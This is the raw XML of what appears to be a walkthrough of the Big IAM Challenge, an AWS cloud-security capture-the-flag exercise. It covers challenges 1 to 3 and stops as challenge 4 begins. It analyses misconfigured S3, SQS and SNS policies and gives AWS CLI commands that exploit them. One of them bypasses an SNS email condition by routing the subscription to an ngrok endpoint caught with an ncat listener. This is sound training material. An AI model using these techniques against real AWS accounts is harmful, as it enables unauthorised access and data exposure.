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xsi="http://www.w3.org/2001/XMLSchema-instance">
  <w:body>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:b w:val="true"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:b w:val="true"/>
        </w:rPr>
        <w:t>INTRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:b w:val="true"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>The Big IAM Challenge is an immersive cybersecurity experience designed to test your expertise in Identity and Access Management (IAM) security in the AWS environment. The challenge simulates real-world scenarios where misconfigured IAM policies and permissions create vulnerabilities. Your goal? To uncover these weak points, exploit them ethically, and demonstrate how attackers can leverage them to escalate privileges or gain unauthorised access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:b w:val="true"/>
        </w:rPr>
        <w:t>CHALLENGE 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="4757622"/>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4757622"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:b w:val="true"/>
        </w:rPr>
        <w:t>WHAT DOES THE POLICY READ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>This policy is an AWS S3 bucket policy that defines permissions for accessing objects within the S3 bucket thebigiamchallenge-storage-9979f4b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>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WHAT ARE THE SECURITY RISKS OF THE POLICY?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360" w:left="72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Any user (since Principal is set to *) can access (download) any file from this S3 bucket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360" w:left="72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Any user can list objects in the bucket but only for files that are under the files/ directory. The user cannot list objects in other parts of the bucket (if they exist)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pP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EXPLOITING THE FLAW</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To List the files in the bucket, you can make use of the AWS CLI in the challenge:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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Run the Command:</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 xml:space="preserve"> aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/</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53796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43600" cy="537960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Now, you can use the s3:GetObject permission from the policy to download the file and inspect its contents.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Since the file is a read only file, we will not be able to download it but we can still view the content of the file using this command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt - </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="70457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943600" cy="704575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHALLENGE 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="2192481"/>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943600" cy="2192481"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>WHAT DOES THE POLICY READ?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="24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The AWS IAM policy defines permissions for an SQS (Simple Queue Service) resource. It allows anyone to send and receive from the specified SQS queue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>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WHAT ARE THE SECURITY RISKS OF THE POLICY?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0" w:before="240"/>
        <w:ind w:hanging="360" w:left="72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Any AWS user (or potentially any external service) can interact with the SQS queue. This is a serious security risk because anyone on the internet or within AWS can send or receive messages from this queue without restriction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="0" w:before="240"/>
        <w:ind w:hanging="360" w:left="72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With unrestricted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqs:SendMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>, there's no control over what kind of data or size of messages might be sent. Attackers could send malicious content, causing potential resource overuse or exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pP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Regular" w:eastAsia="Barlow Regular" w:hAnsi="Barlow Regular" w:cs="Barlow Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>EXPLOITING THE FLAW</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From the policy, we know it applies to this specific SQS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Since we have the permission to send message to the queue, we can use this command to post a message:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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aws sqs send-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2 --message-body "Testing Wiz"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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6157912" cy="1246933"/>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6157912" cy="1246933"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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To receive the message from the queue:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2</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1906253"/>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943600" cy="1906253"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Navigating to the URL path(https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the body of the Message gives access to the Flag </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="981690"/>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943600" cy="981690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Challenge 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="3532296"/>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5943600" cy="3532296"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>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What Does the policy above read?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Regular" w:eastAsia="Monospace Regular" w:hAnsi="Monospace Regular" w:cs="Monospace Regular"/>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 xml:space="preserve">The IAM policy is for an SNS (Simple Notification Service) Topic and is structured to allow subscriptions under certain conditions. </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WHAT ARE THE SECURITY RISKS OF THE POLICY?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="240"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>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The policy allows any AWS account to subscribe to the SNS topic without restriction. This means any malicious or unauthorized user can attempt to subscribe, increasing the attack surface.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr/>
        <w:spacing w:after="240"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:jc w:val="both"/>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While the condition limits the subscription endpoint to email addresses from @tbic.wiz.io, it does not ensure that these email addresses are from trusted or authorized users.</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Regular" w:eastAsia="Barlow Regular" w:hAnsi="Barlow Regular" w:cs="Barlow Regular"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>EXPLOITING THE FLAW</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To subscribe to the notification service, run this command on the AWS CLI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="false"/>
        <w:spacing w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol email --notification-endpoint testing@tbic.wiz.io </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890730"/>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5943600" cy="890730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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We get response says pending confirmation. This means we have to have access to the email address to confirm the subscription. Also, using an email that does not end with tbic.wiz.io will not go through</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WAY FORWARD?</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After inspecting the subscribe command, adding a random string before the email address i.e !testing@tbic.wiz.io still goes through.</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785629"/>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alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="785629"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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We can use this to out advantage and set up  a simple HTTP listening endpoint. In my case, I made use of ngrok.</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To start up ngrok on your machine, run:</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ngrok http &lt;port-number&gt;</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 xml:space="preserve"> the port number  is what the host will listen on (you can use any port number)</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On another terminal, run the netcat command to set up a listener on the port specified</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ncat -nvlp &lt;port-number&gt;</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Since ngrok automatically configures port forwarding, we can access the URL over the internet</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Next step is to subscribe for the notifcation service again, but this time, with some changes in the protocol  used and the endpoint.</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aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol https --notification-endpoint "https://da20-102-89-82-84.ngrok-free.app/testing@tbic.wiz.io"</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Upon running the command, we are able to see the subscription confirm URL on the netcat terminal.</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2957782"/>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alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2957782"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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When you navigate to the SUBSCRIBEURL, the confirmation is then confirmed and we have the flag</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2936713"/>
            <wp:docPr id="12"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7">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2936713"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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CHALLENGE 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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4805196"/>
            <wp:docPr id="13"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8">
                      <a:alphaModFix amt="100000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4805196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Barlow Medium" w:eastAsia="Barlow Medium" w:hAnsi="Barlow Medium" w:cs="Barlow Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>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Bold" w:eastAsia="Barlow Bold" w:hAnsi="Barlow Bold" w:cs="Barlow Bold"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:i w:val="false"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>What Does the policy above read?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:hanging="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Monospace Medium" w:eastAsia="Monospace Medium" w:hAnsi="Monospace Medium" w:cs="Monospace Medium"/>
          <w:strike w:val="false"/>
          <w:u w:val="none"/>
          <w:spacing w:val="0"/>
